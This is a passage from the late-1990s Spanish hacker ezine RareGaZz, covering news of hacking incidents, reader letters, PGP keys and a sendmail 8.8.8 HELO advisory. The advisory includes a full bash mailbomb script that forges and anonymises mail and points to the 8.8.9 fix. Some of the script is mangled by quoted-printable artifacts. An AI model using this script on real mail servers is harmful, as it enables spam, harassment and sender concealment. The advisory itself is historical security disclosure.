la  Guardia Civil  detuvo  en abril  pasado  a dos empleados de una empresa de
Gibraltar y  a un profesor  de Aviles (Asturias)  acusados de  formar un grupo
denominado Hispahack.

Dicho grupo habria  accedido a los ordenadores de la NASA, la agencia espacial
americana, y al sistema informatico de la Universidad Politecnica de Catalua,
donde  fue descubierto. Una de  sus travesuras consistio en sustituir por otra
la pagina que el Congreso de los Diputados mantiene en Internet.

           (Articulo extraido del diario 'El Pais Digital')

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

        MICROSOFT DEBE PONERSE A DISPOSICION DE LA JUSTICIA

El juez Thomas Penfield Jackson ordeno el viernes a Microsoft que Bill Gates y
16  de los  mas  importantes  ejecutivos  de  la  empresa  deberan  ponerse  a
disposicion de la  justicia para  declarar las veces que sean necesarias en el
juicio  por presuntas  actividades monopolicas que se lleva adelante contra el
gigante  del software.  El  magistrado tambien le  exigio a Microsoft que de a
conocer el  codigo principal de  ciertas versiones de  los sistemas operativos
Windows 95 y Windows 98. Estos requerimientos se producen tras la propuesta de
Microsoft  que,  alegando  que  Gates  era  "un  hombre  muy  ocupado",  habia
solicitado que  el hombre  fuerte de  la empresa  testificara por un maximo de
ocho  horas en  su  presentacion del  12  de agosto y que se presentaran en la
corte  no mas  de  ocho ejecutivos.  Tras  las declaraciones del juez Jackson,
Microsoft  anuncio que  acatara  el  pedido  del  magistrado aunque tambien lo
alerto de que  hoy solicitara la desestimacion total del caso, una tactica que
para el abogado del gobierno, David Boies, "era previsible".

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

           (Articulo de Merce Molist, redactora de 'El Ciber-P@is')

                HACKERS ESPAOLES ATACAN LUGARES CHILENOS

La cuenta  de correo de  la Fundacion Augusto Pinochet y la oficial del citado
senador chileno  fueron violadas,  la semana  pasada, por  el grupo de hackers
Abstraccion, "como protesta por los continuos ataques a intereses espaoles en
Chile", segun revelaron en una nota enviada a "El Pais".
Abstraccion,  un grupo  hasta  ahora desconocido  en  la escena  espaola, que
afirma  estar en  activo desde hace tres aos, descubrio las contraseas de las
dos cuentas  y las cambio por "garzon"  y "garzon1998", respectivamente, en lo
que ellos  mismos calificaron  de  "bromilla":  "Sabemos  que  esto  solo  les
causara una pequea molestia... pero es el principio". Al cabo de pocas horas,
la Fundacion Augusto Pinochet habia solventado el ataque.

Otros  grupos de  hackers  espaoles  se  han unido a la causa y han intentado
reiterados  "mailbombings"  (bombardear  un  servidor  con  gran  cantidad  de
mensajes  de correo)  contra  intereses chilenos  en  la red,  aunque  no  han
funcionado  porque las  maquinas  estaban preparadas  para  rechazarlos. Estas
acciones se enmarcan  dentro del llamado "hacktivismo", la ultima tendencia en
el  mundo "underground",  que  consiste  en "hackear"  por  motivos sociales o
politicos.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

           (Articulo de Merce Molist, redactora de 'El Ciber-P@is')

                           NO FUE UN SUICIDIO

El grupo aleman  de hackers, Chaos Computer Club, ha hecho publica una nota en
la  que duda  de la hipotesis policial del suicidio para explicar la muerte de
uno de  sus miembros mas brillantes, apodado "Tron": "Siempre tuvo un caracter
abierto  y  directo  y  nunca  se  guardaba  los  problemas para si mismo. Las
circunstacias bajo  las que  desaparicio y sus extraordinarias capacidades nos
han llevado  a la  conclusion de  que ha sido victima de un homicidio". "Tron"
era  un  reconocido  experto  en  sistemas  de  encriptacion  aplicados  a las
telecomunicaciones.  Su  ultimo  exito  habia  sido demostrar que las tarjetas
alemanas de GSM se podian clonar.


*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

           (Articulo de Merce Molist, redactora de 'El Ciber-P@is')

               ASALTAN LA UNIVERSIDAD DE LA HIJA DE CLINTON

Durante  las  ultimas  tres  semanas,  un  grupo de hackers ha estado espiando
impunemente  las comunicaciones  electronicas de  al menos 4.500 alumnos de la
Universidad  de Stanford.  Los  piratas, suecos y canadienses, aprovecharon un
agujero  del sistema  para robar las contraseas de acceso al correo. Se da la
casualidad  que en  esta universidad,  conocida por tener un reputado grupo de
expertos en seguridad, estudia la hija del presidente norteamericano,  Chelsea
Clinton.  No se  ha esclarecido  aun  si  su  correo,  que  cuenta con medidas
adicionales de proteccion, tambien fue violado.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

El  dia  17 de  Diciembre se celebraron  unas interesantes  jornadas sobre  la
confiabilidad en Internet. Un miembro de RareGaZz, PaTa, estuvo alli.

         Se trataron temas tan interesanes como.

        - Comunicaciones de voz y datos por internet.
        - Banca y comercio electronico en internet.
        - Seguridad en Internet.
        - Firma electronica.  Propuesta europea.
        - Experiencia de Feste como proveedor de servicios de Certificacion.
        - Las profesiones juridiacs y la seguridad en Internet.

Todo  esto enfocado  hacia la  seguridad, fue  un nivel  asequible sin grandes
aspiraciones pero facilmente entedibles por los asistentes.

Se metio mucha  caa a temas como la firma digital para reconocer la identidad
del  remitente  de  mensajes,  la  criptografia  y  sus   aplicaciones  y  los
certificados digitales.

Solo  decir que acudi  con Chichus, y dimos el cantazo entre los asistentes de
mala  manera, eramos  los unicos  que ibamos sin corbata bueno y la periodista
que asistio, que si hubiera ido sin ropa no nos hubiera importado.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ C a r t a s   d e l   L e c t o r ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Disculpa,  se  que  lo  que  pregunto  es  una  estupidez,  pero  apenas estoy
aprendiendo. Donde compilo los archivos en c o que tengo que hacer con ellos?

  [ Esta es, desgraciadamente, una pregunta muy frecuente. Yo siempre contesto
    lo mismo: " Se compila en linux y se pone 'cc fichero.c -o fichero' ".
    Pero no creo que sirva de mucho.
    Quiero decir, que  de que  sirve hacerse  root con un exploit que no sabes
    como funciona? es mas .... si ni siquiera sabes como  se compila!!! A  ver
    si os vais dando cuenta que eso no es hackear.
    Para  convertiros en  verdaderos hackers  primero debeis  aprender algo de
    informatica ... un minimo por lo menos. ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Desde ya, si les parece bien, podriamos hacer un trato aunque no creo que para
uds  sea negocio...  pero... enseenme,  manden la  info que puedan para estos
lados  y yo  me comprometo a  ayudar en lo  que pueda  con el desarrollo de la
pagina  y la  revista... aunque  ya deben  tener varios  ayudantes... de todos
modos si pueden manden info...

  [ Hay gente que  opta por suscribirse  a la lista de correo e ir aprendiendo
    poco  a poco,  preguntando alli  sus  dudas, o  incluso, preguntandonos  a
    nosotros directamente ... Yo hasta ahora he contestado todos mis  mails (y
    si no lo he hecho es porque me fallaria el correo); y estoy seguro  de que
    el resto de miembros de RareGaZz hace lo mismo.
    Pero hay otra gente que quiere aprender por el camino facil. Quiere que se
    lo ensees  todo (y cuanto mas rapido y facil mejor) ... pues que sepa ese
    tipo de  gente que yo contesto  a todas las dudas (siempre que este dentro
    de mis posibilidades) pero NUNCA voy a ensear desde cero y todo lo que se
    a una persona. Si alguien quiere aprender que estudia y luego pregunte sus
    dudas, pero que no pida que se le ensee todo. ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

ke tal, solo keria saber si siguen por aki xDDD

  [ Pues claro que si!!!! al pie del caon, como siempre ... y todo  gracias a
    vosotros. ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Hola soy  lector de  vuestro ezine  y me he propuesto seleccionar unos cuantos
articulillos de  diversas ezines para mi pagina. Me preguntaba si hay problema
o pasa algo.

  [ Cualquiera puede  incluir textos nuestros  en su web ... siempre que ponga
    de  donde lo  saco (por  ejemplo: 'texto  extraido de  RareGaZz -  http://
    raregazz.acapulco.uagro.mx') ]


*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Este bug nos lo envio Mr. AZTECh y es sobre la version 8.8.8 de sendmail:

 COMMANDO
Sendmail

 SISTEMAS AFECTADOS
Sistemas corriendo el sendmail 8.8.8 (y anteriores) y MS Exchange

 PROBLEMA

Michal  Zalewski descubrio  esto recientemente.  Cuando  alguien bombardea  tu
correo, o  trata de  mandar correo  falso, spam, etc - el programa de sendmail
adjunta la direccion del host del atacante asi como su direccion en el mensaje
que envia.

----
  From mail@bomber.gob.mx Mon Jan 5 22:08:21 1998
  Received: from salinas (carlitos@almoloya.edu.mx 
  [870.127.24.8])

  by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
  for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
  Date: Mon, 5 Jan 1998 22:07:54 +0100
  From: mail@bomber.gob.mx
  Message-Id: <3.14159665@pi>

  MAILBOOM!!!
----

Perfecto - Ahora sabes  quien es el responsable de esa porqueria molesta en tu
correo: "Received:  from salinas  (carlitos@almoloya.edu.mx  [870.127.24.8])".
Muy facil no?

Pero Zalewski encontro un pequeo agujero, que le permite a un usuario esconder
su  identidad, y  enviar mails anonimamente. Lo unico que debes hacer es sobre
pasar  la  cadena  del  HELO,  que  es aproximadamente de 1024 caracteres - la
direccion del  remitente y otra informacion interesante estara " cortada". Las
cabezeras  de los  mensajes, no  contendran informacion  interesante. (Pero no
siempre  seran anonimos  si esque se pueden obtener los logs de la maquina que
se uso para enviar el mensaje):

----
  From mail@bomber.gov.mx Mon Jan 5 22:09:05 1998
  Received: from xxxxxxxxxxxxxx... [muchas x (1024 aprox.] 
  ...xxxx
  Date: Mon, 5 Jan 1998 22:08:52 +0100
  From: mail@bomber.gov.mx
  Message-Id: <3.14159665@pi>

  MAILBOOM!!! Adivina quien soy?
----

Aqui  les pongo  un simple ejemplo del uso del agujero del sendmail. Nota este
script ha  sido escrito  solo para demostrar que facil es enviar mails falsos,
bombardear correos, con la ayuda del Sendmail. El Script es muuuy lento y esta
restringido  en muchas formas,  pero ayuda a entender  bien el problema (Nota,
algunos de los daemons no-Berkeley tambien se ven afectados):

  #!/bin/bash
  TMPDIR=3D/tmp/`whoami`
  PLIK=3D$TMPDIR/.safe
  TIMEOUT=3D2
  LIMIT=3D10
  MAX=3D20

  echo
  echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
  echo "Author: Michal Zalewski "
  echo

  if [ "$4" =3D "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo
  echo " msgfile - file to send as a message body"
  echo " address - address of lucky recipient"
  echo " server - outgoing smtp server w/sendmail"
  echo " sender - introduce yourself"
  echo
  echo "WARNING: For educational use ONLY. Mailbombing is 
  illegal."
  echo "Think twice BEFORE you use this program in any way. 
  Also,"
  echo "I've never said this program is 100% safe nor bug-
  free."
  echo
  sleep 1
  exit 0
  fi

  if [ ! -f $1 ]; then
  echo "Message file not found."
  echo
  exit 0
  fi

  echo -n "Preparing message..."
  mkdir $TMPDIR &>/dev/null
  chmod 700 $TMPDIR
  echo "echo \"helo =

  _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
  _safebomb__sa=

  febomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
  febomb__safeb=

  omb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
  omb__safebomb=

  __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
  __safebomb__s=

  afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
  afebomb__safe=

  bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
  bomb__safebom=

  b__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
  b__safebomb__=

  safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
  safebomb__saf=

  ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
  ebomb__safebo=

  mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
  mb__safebomb_=

  _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
  _safebomb__sa=

  febomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
  febomb__safeb=

  omb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
  omb__safebomb=

  __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
  __safebomb__s=

  afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
  afebomb__safe=

  bomb_\"" >$PLIK
  echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
  echo "echo \"rcpt to: $2\"" >>$PLIK
  echo "echo \"data\"" >>$PLIK
  echo "cat <<__qniec__" >>$PLIK
  cat $1 >>$PLIK
  echo "__qniec__" >>$PLIK
  echo "echo \".\"" >>$PLIK
  echo "echo \"quit\"" >>$PLIK
  echo "sleep $TIMEOUT" >>$PLIK
  chmod +x $PLIK
  echo "OK"

  echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
  SENT=3D0

  while [ -f $1 ]; do
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=3DSENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  CONNECTED=3D`ps|grep -c "telnet $3"`
  if [ "$LIMIT" -le "$CONNECTED" ]; then
  while [ "$LIMIT" -le "$CONNECTED" ]; do
  sleep 1
  done
  fi
  if [ "$SENT" -ge "$MAX" ]; then
  echo "It's just an example, sorry."
  echo
  exit 0
  fi
  done

Este bug a sido confirmado para MS EXCHANGE tambien

 SOLUCION

Este bug fue arreglado en la version 8.8.9 del Sendmail, este limita el tamano
del  parametro  de  HELO/EHLO  para  prevenir  que  los  spammers  oculten  la
informacion de su conexion, la version se encuentra en:

  ftp://ftp.sendmail.org/pub/sendmail/

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ L l a v e s  P G P ]

NOTA: Azumlord tiene nueva llave PGP. Esta que aparece a continuacion es la
      que vale. Asi que los que tengan la antigua que se la actualicen ...


<<::RareGaZz::>> // raregazz@iname.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

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
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----

<<::Azumlord::>> // azumlord@iname.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDZs7KQRBADhZgrMXRignr0B3qj5k8GA7jJ2RpMBV9GuTFDy8UE0EZ02Ipn+
YjALiH8XbOaAkVDvpeCKnRFPNSsfyjYO+LCMkbhhEjPSH7Jcc4OAH9Z8GNXkxkLb
cvKVahaGhTePH6HmcHXLXCumrr9CxbVr7gd1MN052jhslqX7enRhD1DGhwCg/zfm
AIeYZLsTY1pJplKY9fhBo0cEAMQ4Vm/ElFbm/G/dAUgbzWGTS+eh7/U4IkXj7D/K
b/Y1aeju132w+CkuxbGv5tVa9BniCpy2HxFZv10qwpB2doUFCJF8JAPi2mPtVPIP
ZQM41KUtmQKagGZODcegSL+i+UAJYioOg8bDbt2ISlK6cjQpiYzuGy5cOGZLpRvs
1LddBACsY8C81guRvjgkeyxoUVJqR4B+T0+pQA62pFrDTIhq5XfcJmpykvKp7Ov2
9yLwf3Ws45iIHSvjPFG44snhZOEZ/UqrCvz5wbtXHOg0oyOzmLCuLeq4s5DPvFnz
XioZpJS0ufl822w1oMiDSnG/OtmKcXdF0HP6yUndkrfAmKSE9LQdQXp1bUxvcmQg
PGF6dW1sb3JkQGluYW1lLmNvbT6JAEsEEBECAAsFAjZs7KQECwMCAQAKCRAOw9/T
5ajPwb94AKCDWYsAKQ5lLPjpl2Z2OsH5+XIBsgCeOz7dvZiKN9ZjH6W1/y5PItO6
/C65Aw0ENmzsqxAMAMwdd1ckOErixPDojhNnl06SE2H22+slDhf99pj3yHx5sHId
OHX79sFzxIMRJitDYMPj6NYK/aEoJguuqa6zZQ+iAFMBoHzWq6MSHvoPKs4fdIRP
yvMX86RA6dfSd7ZCLQI2wSbLaF6dfJgJCo1+Le3kXXn11JJPmxiO/CqnS3wy9kJX
twh/CBdyorrWqULzBej5UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xk
hkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58
yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4
DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/
POGxKUAYEY18hKcKctaGxAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlL
IhkmuquiXsNV6UwybwACAgv/ebUao4hmXNPfGg3IbLvVtHNWaYrG58GoIZdr/LVg
psUW4B5MF71JEmKdtqCW+rB6XZs/YOVu2wzW+P/p2l5vnEJXwEeJiUDe8gp8vbZt
RtS8Tv3YSyqiBlMezxHEdLCQIMVdyI9BYjE/RT42v3MWCuov6RFFruDsE8I9x530
/yBbIkr5tF+BTZE6LkweSS7PxRDsZEmFZ1zDAZ21yTrEC/pJNGhrV1rE4/4/3aWu
DH8s+P1o5AkMW3RncnOigtX+MpWjCBfK+eGNGw7zp7T604qhymQb2TOLWAvUgDAk
WtcZvA8IUEvlY6wbsjE/3TDkow2re+rqGEgsM9R+6SQ8PD7dh4Zt8WOyYfmsytx8
RItchcBDk7atLpyju7pgZdiUULdwTf+CjVZBtWX55+qbJr29qc9TlWjDXWiLFr65
9fZXUx4c9RMLxdGRuw13KntQYnu9LBX4VGECidXU4HZqviE0vViFxmQh3J8vI2JL
yA8tmd4lMqnHlWFrNmUKe5z1iQBGBBgRAgAGBQI2bOysAAoJEA7D39PlqM/BNrAA
n01IqpjO1Ze5nxQEKdZuYK9LPGyIAKDyVelSYkyK08oE/E10gpv1C6mI6Q==
=N+Jt
-----END PGP PUBLIC KEY BLOCK-----

Cytorax // cytorax@bigfoot.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----


GuyBrush // guybrush@cyberdude.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

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
WT2KqINEIKul1WKXCwr6
=yQRv
-----END PGP PUBLIC KEY BLOCK-----


PaTa // pata666@bigfoot.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDYnQa4RBADAySpmFKPRfehd/ab08GUwbncNyr8WIMjdY/IzCWGli+oSu83B
2iapT6anGqBH5xA2ASe2o4787EsUTNo99G8dxERBJgraeboTOc98MRWBgr43zdWB
dQM0RHh5YuLljPbaDduzrg6HG9ITlo77X+eTeVntFoIBx++zQZFNwOC9iQCg/6QB
